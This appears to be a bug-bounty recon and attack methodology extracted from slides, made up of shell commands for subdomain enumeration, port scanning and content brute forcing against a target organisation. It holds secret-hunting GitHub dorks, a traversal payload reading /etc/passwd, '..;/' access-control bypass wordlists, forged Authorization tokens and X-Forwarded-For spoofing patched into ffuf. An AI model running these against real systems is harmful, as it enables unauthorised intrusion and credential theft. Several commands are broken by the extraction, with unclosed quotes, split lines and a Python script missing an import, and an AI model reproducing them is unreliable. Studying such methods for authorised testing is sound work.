cat Checking.txt | sed 's/^/mahmoudawali/' | dnsx -resp -cname -silent -stats -retry 3 -t 300 | tee IN.txt
clear
sed -i -- 's/mahmoudawali//' IN.txt
clear
cat OUT.txt | anew -d IN.txt | awk '{print $1}' | sort -u | anew GOOD-Subdomains.txt
clear
cat Checking.txt | anew -d GOOD-Subdomains.txt | dnsx -resp -aaaa -silent -stats -retry 3 -t 300 | tee OUT.txt
clear
cat Checking.txt | anew -d GOOD-Subdomains.txt | sed 's/^/mahmoudawali/' | dnsx -resp -aaaa -silent -stats -retry 3 -t 300 | tee
IN.txt
clear
sed -i -- 's/mahmoudawali//' IN.txt
clear
cat OUT.txt | anew -d IN.txt | awk '{print $1}' | sort -u | anew GOOD-Subdomains.txt
clear
cat Checking.txt | anew -d GOOD-Subdomains.txt | dnsx -resp -ns -silent -stats -retry 3 -t 300 | tee OUT.txt
clear
cat Checking.txt | anew -d GOOD-Subdomains.txt | sed 's/^/mahmoudawali/' | dnsx -resp -ns -silent -stats -retry 3 -t 300 | tee IN.txt
clear
sed -i -- 's/mahmoudawali//' IN.txt
clear
cat OUT.txt | anew -d IN.txt | awk '{print $1}' | sort -u | anew GOOD-Subdomains.txt
clear
cat Checking.txt | anew -d GOOD-Subdomains.txt | dnsx -resp -txt -silent -stats -retry 3 -t 300 | tee OUT.txt
clear
cat Checking.txt | anew -d GOOD-Subdomains.txt | sed 's/^/mahmoudawali/' | dnsx -resp -txt -silent -stats -retry 3 -t 300 | tee IN.txt
clear
sed -i -- 's/mahmoudawali//' IN.txt
clear
cat OUT.txt | anew -d IN.txt | awk '{print $1}' | sort -u | anew GOOD-Subdomains.txt
clear

┌──(mahmoud㉿mohamed)-[~]
└─$ bash Checking.sh
Subdomains Permutation AND Alterations
1 - Generate Permutation AND Alterations

gotator

┌──(mahmoud㉿mohamed)-[~]
└─$ gotator -sub GOOD-Subdomains.txt -perm COMMONWORDS.txt -prefixes -silent
-depth 2 -mindup -md -adv -numbers 5 | tee -a gotator-OUT.txt

Subdomains Permutation AND Alterations

2 - Resolvable Subdomains

dnsx

┌──(mahmoud㉿mohamed)-[~]
└─$ cat gotator-OUT.txt | dnsx -retry 3 -threads 300 -resp -no-color -stats -silent -a
-aaaa -cname | tee -a dnsx-OUT.txt
Code Environments
1 - Github

Github
Github
/(\.|@)ROOT\.TLD/ AND /(pass|sql|authorization)/

/(\.|@)ROOT\.TLD/ AND /(ftp|jdbc)/

/(\.|@)ROOT\.TLD/ AND /(xoxp|AIza|AKIA)/

/(\.|@)ROOT\.TLD/ AND /eyj([0-9A-Za-z]).+\.eyj([0-9A-Za-z]).+\.([0-9A-Za-z]).+/

Code Environments
2 - Postman

Postman

bing
Google
yahoo ! Startpage
DuckDuckGo

site:postman.com ROOT.TLD
Resolvable Subdomains AND HTTP Service
1 - Resolvable Subdomains

dnsx

┌──(mahmoud㉿mohamed)-[~]
└─$ cat GOOD-Subdomains.txt | dnsx -retry 3 -threads 300 -no-color -stats -silent
-json | tee -a dnsx-OUT.json

Resolvable Subdomains AND HTTP Service

2 - HTTP Service

┌──(mahmoud㉿mohamed)-[~]
└─$ jq -r '.a[]?' dnsx-OUT.json | sort -u | tee -a all-IP.txt

nmap

┌──(mahmoud㉿mohamed)-[~]
└─$ sudo nmap -sS -n -Pn -p- --max-hostgroup 1 --max-rtt-timeout 100ms --min-rate
65535 --open -iL all-IP.txt -oX output-ORG.xml

tew

┌──(mahmoud㉿mohamed)-[~]
└─$ tew -x output-ORG.xml | tee -a IN.txt

httprobe

┌──(mahmoud㉿mohamed)-[~]
└─$ cat IN.txt | httprobe -c 100 -method HEAD -prefer-https | tee -a alive-IP.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ sed 's|^https://||' alive-IP.txt | sed 's|^http://||' | tee -a IP-Port.txt

tew

┌──(mahmoud㉿mohamed)-[~]
└─$ tew -i IP-Port.txt -dnsx dnsx-OUT.json -vhost | sed 's/:443$//' | sed 's/:80$//' | sort
-u | tee -a alive-Subdomains.txt
HTTP Analysis
1 - HTTP Service alive

httpx

┌──(mahmoud㉿mohamed)-[~]
└─$ httpx -list alive-Subdomains.txt -silent -retries 3 -timeout 20 -threads 400
-status-code -tech-detect -web-server -content-type -title -location -line-count
-word-count -stats -no-color -body-preview -http-proxy http://127.0.0.1:8080
-store-response -store-response-dir ORG-Output -output ORG-Subdomains.txt

HTTP Analysis
2 - HTTP Service screenshots

┌──(mahmoud㉿mohamed)-[~]
└─$ awk '{print $1}' ORG-Subdomains.txt | tee -a HTTP-subdomains.txt

gowitness

┌──(mahmoud㉿mohamed)-[~]
└─$ gowitness file --threads 20 --delay 10 --fullpage --screenshot-db-store --file
HTTP-subdomains.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ gowitness report serve --address localhost:8888
Content Discovery
1 - Search Engines

google
Google
site:SUB.ROOT.TLD

Google Search I’m Feeling Lucky

bing
bing
site:SUB.ROOT.TLD

yahoo
yahoo !
site:SUB.ROOT.TLD

duckduckgo
DuckDuckGo
site:SUB.ROOT.TLD

startpage
Startpage
site:SUB.ROOT.TLD
Content Discovery
2 - Spidering

katana

┌──(mahmoud㉿mohamed)-[~]
└─$ katana -no-color -silent -concurrency 50 -retry 3 -js-crawl -jsluice -headless -depth 2
-store-response -store-response-dir katana-Output -list HTTP-subdomains.txt -output katana.txt

Content Discovery
3 - Enumeration

gau

┌──(mahmoud㉿mohamed)-[~]
└─$ cat HTTP-subdomains.txt | gau --retries 3 --threads 5 --timeout 90 | tee -a gau-OUT.txt

xurlfind3r

┌──(mahmoud㉿mohamed)-[~]
└─$ xurlfind3r --silent --no-color --parse-wayback-source --parse-wayback-robots
--configuration config.yaml --list HTTP-subdomains.txt | tee -a xurlfind3r-OUT.txt

httpx

┌──(mahmoud㉿mohamed)-[~]
└─$ cat gau-OUT.txt xurlfind3r-OUT.txt | sed 's|^https://||' | sed 's|^http://||' | sed 's/:443//' | sed
's/:80//' | sed 's/\?.*// | urldedupe --regex-parse --similar | tee -a check-Enumeration.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ httpx -list check-Subdomains.txt -silent -retries 3 -timeout 20 -threads 400 -status-code
-content-type -title -location -stats -no-color -body-preview -store-response
-store-response-dir ORG-Enumeration -output ORG-Enumeration.txt

waymore

┌──(mahmoud㉿mohamed)-[~]
└─$ waymore -mode B -url-filename --timeout 90 --output-inline-js --retries 3 --config
config.yml --limit 0 --output-responses waymore-Output --output-urls
waymore-OUT.txt --input ROOT.TLD
JavaScript
1 - Enumeration

urldedupe

┌──(mahmoud㉿mohamed)-[~]
└─$ cat katana.txt ORG-Enumeration.txt | grep -E '(\.js$|\.js\?.*)' | urldedupe --regex-parse
--similar | tee -a JS-Enumeration.txt

JS URLs Monitoring Secret Keys

Subdomains

Endpoints

Host JS Files

JavaScript
2 - Parsing

katana

┌──(mahmoud㉿mohamed)-[~]
└─$ katana -no-color -silent -concurrency 50 -retry 3 -js-crawl -jsluice -headless -depth 2
-store-response -store-response-dir JS-Output -list JS-Enumeration.txt -output JS-katana.txt
Sensitive Information Disclosure
1 - Enumeration

trufflehog

┌──(mahmoud㉿mohamed)-[~]
└─$ trufflehog filesystem dir-ORG | tee -a trufflehog.txt

detectors:
- keywords:
- YOUR-KEYWORD
name: Detector Name
regex:
Name: 'Regex'
┌──(mahmoud㉿mohamed)-[~]
└─$ trufflehog filesystem --config trufflehog-v3.yaml dir-ORG | tee -a trufflehog.txt

noseyparker

┌──(mahmoud㉿mohamed)-[~]
└─$ noseyparker scan --progress always --datastore ORG-DB dir-ORG

┌──(mahmoud㉿mohamed)-[~]
└─$ noseyparker report --datastore ORG-DB
Scanner
1 - Bulk Scanning

nuclei

┌──(mahmoud㉿mohamed)-[~]
└─$ cat HTTP-subdomains.txt | nuclei -disable-clustering -scan-strategy template-spray
-bulk-size 300 -concurrency 1 -retries 3 -timeout 15 -stats -silent -no-color
-disable-update-check -templates MY-Templates/ -markdown-export BUGS | tee -a BUGS.txt

Scanner
2 - Adobe Experience Manager

aem-hacker

┌──(mahmoud㉿mohamed)-[~]
└─$ python3 aem_discoverer.py --workers 300 --file HTTP-subdomains.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ python3 aem_discoverer.py --workers 5 --host burp-collaborator --url http://URL
Scanner
2 - Bulk Scanning

nuclei

https://SUB.ROOT.TLD/SUB
https://SUB.ROOT.TLD/ROOT
……
……
https://2SUB.SUB.ROOT.TLD/2SUB
https://2SUB.SUB.ROOT.TLD/2SUB.SUB
……
……
https://SUB.ROOT.TLD/admin
https://SUB.ROOT.TLD/dashboard

┌──(mahmoud㉿mohamed)-[~]
└─$ cat HTTP-subdomains.txt | nuclei -disable-clustering -scan-strategy template-spray
-bulk-size 300 -concurrency 1 -retries 3 -timeout 15 -stats -silent -no-color
-disable-update-check -templates low-Info/ -markdown-export BUGS | tee -a BUGS.txt
Scanner
3 - Bulk Scanning

┌──(mahmoud㉿mohamed)-[~]
└─$ sed -i -- '/- "{{BaseURL}}\//s|/|/x/..;/|2' *.yaml

┌──(mahmoud㉿mohamed)-[~]
└─$ sed -i -- "/- '{{BaseURL}}\//s|/|/x/..;/|2" *.yaml

┌──(mahmoud㉿mohamed)-[~]
└─$ sed -i -- '/GET \/.* HTTP/s|/|/x/..;/|2' *.yaml

┌──(mahmoud㉿mohamed)-[~]
└─$ sed -i -- '/POST \/.* HTTP/s|/|/x/..;/|2' *.yaml

┌──(mahmoud㉿mohamed)-[~]
└─$ sed -i -- 's|HTTP/x/..;/1.1|HTTP/1.1|' *.yaml

┌──(mahmoud㉿mohamed)-[~]
└─$ cat HTTP-subdomains.txt | nuclei -disable-clustering -scan-strategy template-spray
-bulk-size 300 -concurrency 1 -retries 3 -timeout 15 -stats -silent -no-color
-disable-update-check -templates low-Info/ -markdown-export BUGS | tee -a BUGS.txt
IPv4
5 - IPs Validation

tew

Resolvable Subdomains AND HTTP Service

┌──(mahmoud㉿mohamed)-[~]
└─$ tew -x output-ORG.xml | tee -a IN.txt

anew

TLS subject alternative and common names

┌──(mahmoud㉿mohamed)-[~]
└─$ tew -x Output.xml | anew IN.txt

cut-cdn

Removing CDN IPs

┌──(mahmoud㉿mohamed)-[~]
└─$ awk -F ':' '{print $1}' IN.txt | tee CDN-Check.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ cut-cdn -update-all -silent -ip CDN-Check.txt | tee -a CUT-CDN.txt

httprobe

Probe For Working HTTP AND HTTPS Servers

^I\.P\.v\.4:

┌──(mahmoud㉿mohamed)-[~]
└─$ grep -Ef grepIPs.txt IN.txt | sed 's/:80$//' | sed 's/:443$//' | sort -u | tee grepOUT.txt

┌──(mahmoud㉿mohamed)-[~]
└─$ cat grepOUT.txt | httprobe -c 100 -method HEAD | tee -a alive-IP.txt
Origin IP
1 - Censys

"SUB.ROOT.TLD"

dns.names:"SUB.ROOT.TLD"

services.http.response.html_title:"TITLE-SUB"

Origin IP
2 - Shodan

hostname:SUB.ROOT.TLD

ssl:"SUB.ROO.TLD"

http.title:"TITLE-SUB"
Origin IP
3 - Host Header Distribution

httpx

#!/usr/bin/env bash

for Host in `cat alive-subdomains.txt`

oo
httpx -list originIPs.txt -silent -retries 3 -timeout 20 -threads 400 -status-code
-tech-detect -web-server -content-type -title -location -line-count -word-count -stats
-no-color -body-preview -H "Host: $Host" | tee -a ORG-$Host.txt
done

cat ORG-*.txt | sed -i -- 's| \[|\] \[|1' | tee -a all-ORG.txt

[URL] [Status-Code] [Redirection] [Content-Type] [Title] [Body] [Server] [Lines] [Words] [Technology]

┌──(mahmoud㉿mohamed)-[~]
└─$ cat all-ORG.txt | awk -F '\t' '{print $1 "\t" $2 "\t" $5 "\t" $6 "\t" $8 "\t" $9}' | awk -F '\t' '!seen[$2,$3,$5,$6]++' | tee OUT.txt

Origin IP
4 - DNS Zone Transfers

masscan

┌──(mahmoud㉿mohamed)-[~]
└─$ sudo masscan --rate 100000 --open-only --retries 5 --wait 60 -p 53 -iL IPs.txt -oX
alive-DNS.xml

tew

┌──(mahmoud㉿mohamed)-[~]
└─$ tew -x alive-DNS.xml | tee -a 53-IN.txt

nmap

┌──(mahmoud㉿mohamed)-[~]
└─$ sudo nmap -sS -n -Pn -p 53 --max-hostgroup 10 --script dns-zone-transfer.nse
--script-args "dns-zone-transfer.domain=ROOT.TLD" -iL 53-IN.txt -oX AXFR.xml
Content Brute Forcing
1 - IIS Short Names Checking

sns

┌──(mahmoud㉿mohamed)-[~]
└─$ sns --silent –check --url https://Origin-IP --header "Host: SUB.ROOT.TLD"

┌──(mahmoud㉿mohamed)-[~]
└─$ sns --silent –check --file HTTP-subdomains.txt

Content Brute Forcing

2 - IIS Short Names Enumeration

shortscan

┌──(mahmoud㉿mohamed)-[~]
└─$ shortscan --fullurl --patience 1 --concurrency 20 --output human --header
'X-Forwarded-For: 127.0.0.1' https://IIS-Vulnerable

┌──(mahmoud㉿mohamed)-[~]
└─$ shortscan --fullurl --patience 1 --concurrency 20 --output human --header
'X-Forwarded-For: 127.0.0.1' https://IIS-Vulnerable/path::$INDEX_ALLOCATION
Content Brute Forcing
1 - Generate Wordlist

xnLinkFinder

┌──(mahmoud㉿mohamed)-[~]
└─$ python3 xnLinkFinder.py --no-banner --input /OUR-Data --output xnLinkFinder.txt

import os
import re
import argparse

parser = argparse.ArgumentParser(description='You can run e.g. python3 grepENDPOINTS.py --directory DIR')

parser.add_argument('-d','--directory')
args = parser.parse_args()

if os.path.isdir(args.directory) is True:
pass
else:
sys.exit(print('[+] Check Your Directory :)'))

YOURRegexs = r"""
(?:"|') # Start newline delimiter
(
((?:[a-zA-Z]{1,10}://|//) # Match a scheme [a-Z]*1-10 or //
[^"'/]{1,}\. # Match a domainname (any character + dot)
[a-zA-Z]{2,}[^"']{0,}) # The domainextension and/or path
|
((?:/|\.\./|\./) # Start with / OR ../ OR ./
[^"'><,;| *()(%%$^/\\\[\]] # Next character can't be...
[^"'><,;|()]{1,}) # Rest of the characters can't be
|
([a-zA-Z0-9_\-/]{1,}/ # Relative endpoint with /
[a-zA-Z0-9_\-/]{1,} # Resource name
\.(?:[a-zA-Z]{1,4}|action) # Rest + extension (length 1-4 or action)
(?:[\?|#][^"|']{0,}|)) # ? or # mark with parameters
|
([a-zA-Z0-9_\-/]{1,}/ # REST API (no extension) with /
[a-zA-Z0-9_\-/]{3,} # Proper REST endpoints usually have 3+ chars
(?:[\?|#][^"|']{0,}|)) # ? or # mark with parameters
|
([a-zA-Z0-9_\-]{1,} # filename
\.(?:php|asp|aspx|jsp|json|
action|html|js|txt|xml) # . + extension
(?:[\?|#][^"|']{0,}|)) # ? or # mark with parameters
)
(?:"|') # End newline delimiter
"""

regex = re.compile(YOURRegexs,re.VERBOSE)

for directory,directoriesnames,filesnames in os.walk(args.directory):

for filename in filesnames:
filelookup = os.path.join(directory,filename)
if os.path.isfile(filelookup):
with open(filelookup,encoding='utf8',errors='ignore') as lines:
for line in lines:
match = regex.search(line)
if match:
print (match.string[match.start():match.end()])

unfurl

anew

┌──(mahmoud㉿mohamed)-[~]
└─$ cat katana.txt gau-OUT.txt xurlfind3r-OUT.txt waymore-OUT.txt JS-katana.txt xnLinkFinder.txt | grep -vE
'^(https://|http://)' | sort -u | anew ORG-Wordlist.txt
Content Brute Forcing
2 - MY Wordlist

nucleiNormalization.txt

.git/path/../config
.git/path/..;/config
.git/path;/../config

BIG-Words.txt

users
dashboards
adm

quickENUMERATION.txt

.git/config
public/plugins/piechart/../../../../../../../../etc/passwd
login.php

goodENUMERATION.txt

users/.git/config
dashboards/login.php
adm/login.php

BIG-Words.EXT

users.EXT
dashboards.EXT
login.EXT

BackUPlist.EXT

data/bkp_sys.fdb
postgre_sql/backup_myadmin_%EXT%.tmp
database/db2_%EXT%.mysql

APIWordlist.EXT

%EXT%/AdjustAnaly
%EXT%/smsConfigure
%EXT%/gameBuild

goodNormalization.EXT

adminarea/admin;/../+CSCOE+/logon.html
(S(XXXXXXXX))/pr/(S(XXXXXXXX))d/solr/admin/metrics
webadmin/index///../../hystrix.stream
Content Brute Forcing
3 - Backups Files

fuzzuli

┌──(mahmoud㉿mohamed)-[~]
└─$ fuzzuli -sl -p -to 30 -w 100 -mt all -hm GET -ex rar,zip,tar.gz,tar,gz,jar,7z,bz2,sql,backup,war -f INPUT.txt

ffuf
func (r *SimpleRunner) Execute(req *ffuf.Request) (ffuf.Response, error) {
…..
// set default User-Agent header if not present
if _, ok := req.Headers["User-Agent"]; !ok {
req.Headers["User-Agent"] = fmt.Sprintf("%s", "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/" + strconv.Itoa(rand.Intn(99999999999 - 11111111111) + 11111111111) + " Firefox/102.0")
}

// set default X-Forwarded-For header if not present

if _, ok := req.Headers["X-Forwarded-For"]; !ok {
req.Headers["X-Forwarded-For"] = fmt.Sprintf("%s", strconv.Itoa(rand.Intn(254 - 1) + 1) + "." + strconv.Itoa(rand.Intn(254 - 1) + 1) + "." + strconv.Itoa(rand.Intn(254 - 1) + 1) + "." + strconv.Itoa(rand.Intn(254 - 1) + 1))
}
…..
}

func (r SimpleRunner) Dump(req ffuf.Request) ([]byte, error) {

…..
// set default User-Agent header if not present
if _, ok := req.Headers["User-Agent"]; !ok {
req.Headers["User-Agent"] = fmt.Sprintf("%s", "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/" + strconv.Itoa(rand.Intn(99999999999 - 11111111111) + 11111111111) + " Firefox/102.0")
}

// set default X-Forwarded-For header if not present

┌──(mahmoud㉿mohamed)-[~]
└─$ ffuf -H 'X-Forwarded-For: XFF' -X GET -ignore-body -D -e '2024,2023' -mode pitchfork -w ORG-IP.txt:XFF
-w BackUPlist.EXT:FUZZ -mc all -ac -u https://SUB.ROOT.TLD/FUZZ -of csv -o OUT-ffuf.csv

Content Brute Forcing

4 - Quick Hits

feroxbuster

┌──(mahmoud㉿mohamed)-[~]
└─$ feroxbuster --random-agent --methods GET,POST --headers 'X-Forwarded-For: 127.0.0.1' --timeout 20
--insecure --no-recursion --dont-extract-links --dont-filter --quiet --wordlist nucleiNormalization.txt --url
https://SUB.ROOT.TLD

┌──(mahmoud㉿mohamed)-[~]
└─$ feroxbuster --random-agent --methods GET,POST --headers 'X-Forwarded-For: 127.0.0.1' --timeout 20
--insecure --no-recursion --dont-extract-links --dont-filter --quiet --wordlist quickENUMERATION.txt --url
https://SUB.ROOT.TLD
Content Brute Forcing
5 - Hidden Directories AND Files

// set default X-Forwarded-For header if not present

func (r SimpleRunner) Dump(req ffuf.Request) ([]byte, error) {

// set default X-Forwarded-For header if not present

┌──(mahmoud㉿mohamed)-[~]
└─$ sort -R BIG-Words.txt BIG-Words.EXT | ffuf -H 'X-Forwarded-Host: XFH' -X HEAD -D -e php -mode
pitchfork -w ORG-IP.txt:XFH -w -:FUZZ -mc all -ac -u https://SUB.ROOT.TLD/FUZZ -of csv -o OUT-ffuf.csv

feroxbuster

┌──(mahmoud㉿mohamed)-[~]
└─$ feroxbuster --random-agent --methods GET,POST --headers 'X-Forwarded-For: 127.0.0.1' --timeout 20
--insecure --no-recursion --extract-links --collect-extensions --collect-backups --collect-words
--dont-filter --quiet --wordlist goodENUMERATION.txt --url https://SUB.ROOT.TLD

Content Brute Forcing

6 - Server-Side Normalization

ffuf

┌──(mahmoud㉿mohamed)-[~]
└─$ ffuf -H 'X-Forwarded-For: XFF' -X GET -raw -ignore-body -D -e 'js,config,db,sql,json,csv,log,logs' -mode
pitchfork -w ORG-IP.txt:XFF -w goodNormalization.EXT:FUZZ -mc all -ac -u https://SUB.ROOT.TLD/FUZZ
-of csv -o OUT-ffuf.csv
Content Brute Forcing
7 - Restful API Routes

// set default X-Forwarded-For header if not present

func (r SimpleRunner) Dump(req ffuf.Request) ([]byte, error) {

// set default X-Forwarded-For header if not present

┌──(mahmoud㉿mohamed)-[~]
└─$ ffuf -H 'X-Forwarded-For: XFF' -raw -D -e 'api,api/..,api/..;,api/v1,api/v1..,api/v1..;' -mode pitchfork -w
ORG-IP.txt:XFF -w APIWordlist.EXT:FUZZ -mc all -u https://SUB.ROOT.TLD/FUZZ -of csv -o OUT-ffuf.csv

ffuf

Y2xpZW50OnNlY3JldA==
Basic Y2xpZW50OnNlY3JldA==
Bearer Y2xpZW50OnNlY3JldA==
…….
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VyIjoidmFsdWUifQ.KM5d456Dfj9X_Uuch4faQUADvDofZ4Y1Lktsa6MTJgnaeEkhJ1F1E9ecgbLHkp69zeDmKdqlur0M4zSwJ0YG0A
Basic eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VyIjoidmFsdWUifQ.KM5d456Dfj9X_Uuch4faQUADvDofZ4Y1Lktsa6MTJgnaeEkhJ1F1E9ecgbLHkp69zeDmKdqlur0M4zSwJ0YG0A
BearereyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VyIjoidmFsdWUifQ.KM5d456Dfj9X_Uuch4faQUADvDofZ4Y1Lktsa6MTJgnaeEkhJ1F1E9ecgbLHkp69zeDmKdqlur0M4zSwJ0YG0A
…….
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VyIjoidmFsdWUifQ.
Basic eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VyIjoidmFsdWUifQ.
Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VyIjoidmFsdWUifQ.

┌──(mahmoud㉿mohamed)-[~]
└─$ ffuf -H 'Authorization: KEY -raw -D -e 'api,api/..,api/..;,api/v1,api/v1..,api/v1..;' -mode pitchfork -w
Values.txt:KEY -w APIWordlist.EXT:FUZZ -mc all -u https://SUB.ROOT.TLD/FUZZ -of csv -o OUT-ffuf.csv
Content Brute Forcing
8 - Fuzzing Tools Output Analysis

feroxbuster

500 GET 12l 31w 433c https://www.example.com/text/css

403 GET 11l 26w 345c https://www.example.com/text/css~
500 GET 12l 31w 433c https://www.example.com/text/css.bak
500 GET 12l 31w 433c https://www.example.com/text/css.bak2
500 GET 12l 31w 433c https://www.example.com/text/css.old
500 GET 12l 31w 433c https://www.example.com/text/css.1
500 GET 12l 31w 433c https://www.example.com/text/.css.swp
500 GET 12l 31w 433c https://www.example.com/sec/OAapp/bfapp/buffalo/text/javascript

┌──(mahmoud㉿mohamed)-[~]
└─$ cat feroxbuster-OUT.txt | awk '{print $6 "," $2 "," $3 "," $4}' | column -s ',' -t | awk '!seen[$2,$3,$4]++'

ffuf

XFF,FUZZ,url,redirectlocation,position,status_code,content_length,content_words,content_lines,content_type,duration,resultfile,Ffufhash
api/v1../contestantreport,127.0.0.4,https://www.example.com/api/v1../contestantreport,,24,500,433,29,13,text/html; charset=UTF-8,353.35589ms,,23d4d18
127.0.0.1,Temp.json,https://www.example.com/Temp.json,,1,500,433,29,13,text/html; charset=UTF-8,348.707159ms,,23d4d1
api/v1..;/Manifest,127.0.0.3,https://www.example.com/api/v1..;/Manifest,,13,500,433,29,13,text/html; charset=UTF-8,343.962833ms,,23d4dd
127.0.0.2,api/v1/uploadUpdateOfficeFile,https://www.example.com/api/v1/uploadUpdateOfficeFile,,17,500,433,29,13,text/html; charset=UTF-8,335.071609ms,,23d4d11
127.0.0.1,api/hehost,https://www.example.com/api/hehost,,26,500,433,29,13,text/html; charset=UTF-8,340.074489ms,,23d4d1a
127.0.0.2,api/v1..;/LogOrderOperate,https://www.example.com/api/v1..;/LogOrderOperate,,37,500,433,29,13,text/html; charset=UTF-8,331.290417ms,,23d4d25
api/v1../LogOrderOperate,127.0.0.1,https://www.example.com/api/v1../LogOrderOperate,,36,500,433,29,13,text/html; charset=UTF-8,315.915209ms,,23d4d24
127.0.0.5,api/contestantreport,https://www.example.com/api/contestantreport,,20,500,433,29,13,text/html; charset=UTF-8,307.406962ms,,23d4d14
127.0.0.4,getDBs,https://www.example.com/getDBs,,39,500,433,29,13,text/html; charset=UTF-8,299.653039ms,,23d4d27
api/v1..;/hehost,127.0.0.1,https://www.example.com/api/v1..;/hehost,,31,500,433,29,13,text/html; charset=UTF-8,307.881977ms,,23d4d1f
127.0.0.3,thirdPartyRef,https://www.example.com/thirdPartyRef,,38,500,433,29,13,text/html; charset=UTF-8,302.93387ms,,23d4d26
127.0.0.2,api/..;/contestantreport,https://www.example.com/api/..;/contestantreport,,22,500,433,29,13,text/html; charset=UTF-8,304.746114ms,,23d4d16
127.0.0.1,api/..;/uploadUpdateOfficeFile,https://www.example.com/api/..;/uploadUpdateOfficeFile,,16,500,433,29,13,text/html; charset=UTF-8,223.805716ms,,23d4d10
127.0.0.5,api/../uploadUpdateOfficeFile,https://www.example.com/api/../uploadUpdateOfficeFile,,15,500,433,29,13,text/html; charset=UTF-8,224.858036ms,,23d4df
127.0.0.2,api/../hehost,https://www.example.com/api/../hehost,,27,500,433,29,13,text/html; charset=UTF-8,231.609996ms,,23d4d1b
127.0.0.4,api/v1/hehost,https://www.example.com/api/v1/hehost,,29,500,433,29,13,text/html; charset=UTF-8,235.404879ms,,23d4d1d
127.0.0.3,api/v1../uploadUpdateOfficeFile,https://www.example.com/api/v1../uploadUpdateOfficeFile,,18,500,433,29,13,text/html; charset=UTF-8,232.094468ms,,23d4d12
api/v1/Manifest,127.0.0.1,https://www.example.com/api/v1/Manifest,,11,500,433,29,13,text/html; charset=UTF-8,233.651846ms,,23d4db
127.0.0.1,api/../contestantreport,https://www.example.com/api/../contestantreport,,21,500,433,29,13,text/html; charset=UTF-8,235.850645ms,,23d4d15
127.0.0.2,api/v1../Manifest,https://www.example.com/api/v1../Manifest,,12,500,433,29,13,text/html; charset=UTF-8,244.31744ms,,23d4dc
127.0.0.5,api/listmultiple,https://www.example.com/api/listmultiple,,40,500,433,29,13,text/html; charset=UTF-8,248.576754ms,,23d4d28

┌──(mahmoud㉿mohamed)-[~]
└─$ cat OUT-ffuf.csv | awk -F ',' '{print $3 "," $6 "," $10 "," $9 "," $8}' | column -s ',' -t |
awk '!seen[$2,$3,$4,$5]++'
Parameters OR Headers
9 - Parameters OR Headers Brute Forcing

┌──(mahmoud㉿mohamed)-[~]
└─$ x8

--url URL

--method GET

--progress-bar

--body '{%s}'

--http 1.1

--data-type urlencoded

--custom-parameters admin debug _debug disable

--custom-values 1 0 false off null true yes no

--max 20

--headers

--concurrency 5

--output x8-OUT.txt

--output-format url

-H "Header: Value"
Virtual Host
1 - MY Wordlist

VHost.EXT

%EXT%
%EXT%:1
%EXT%:2
….
%EXT%:500
….
%EXT%:8000
….
%EXT%:65535

Internal-IPs.txt

192.168.0.1
192.168.1.2
….
172.16.0.1
172.17.1.2
172.18.3.4
….
10.1.1.4
….

Internal-IPs-Resolvable.txt

internal.ROOT.TLD
jira.ROOT.dev
….
admin.ROOT.TLD

Common-Words.txt

www
mail
remote
blog
….
webmail
server
dev
origin
corp
Virtual Host
2 - Host Header Fuzzing

ffuf

X-Forwarded-For
X-Client-IP
X-Real-IP
True-Client-IP
CF-Connecting-IP
X-Cluster-Client-IP
Fastly-Client-IP
X-Originating-IP
X-Remote-IP
X-Remote-Addr
X-Host
X-Forwarded-Host
X-Forwarded-By

┌──(mahmoud㉿mohamed)-[~]
└─$ ffuf -H 'X-Forwarded-For: XFF' -H 'Host: FUZZ' -D -e 'localhost,127.0.0.1' -mode
pitchfork -w ORG-IP.txt:XFF -w VHost.EXT:FUZZ -mc all -u
https://SUB.ROOT.TLD/ -of csv -o OUT-ffuf.csv

┌──(mahmoud㉿mohamed)-[~]
└─$ ffuf -H 'Host: FUZZ' -w Internal-IPs.txt:FUZZ -mc all -u https://SUB.ROOT.TLD/ -of
csv -o OUT-ffuf.csv

┌──(mahmoud㉿mohamed)-[~]
└─$ ffuf -H 'Host: FUZZ' -w Internal-IPs-Resolvable.txt:FUZZ -mc all -u
https://SUB.ROOT.TLD/ -of csv -o OUT-ffuf.csv

┌──(mahmoud㉿mohamed)-[~]
└─$ ffuf -H 'Host: FUZZ.ROOT.TLD' -w Common-Words.txt:FUZZ -mc all -u
https://SUB.ROOT.TLD/ -of csv -o OUT-ffuf.csv
Attack Surface
1 - 401 AND 403 Status Code

ffuf

func (r SimpleRunner) Execute(req ffuf.Request) (ffuf.Response, error) {

func (r SimpleRunner) Dump(req ffuf.Request) ([]byte, error) {

X-Forwarded-For
X-Client-IP
X-Real-IP
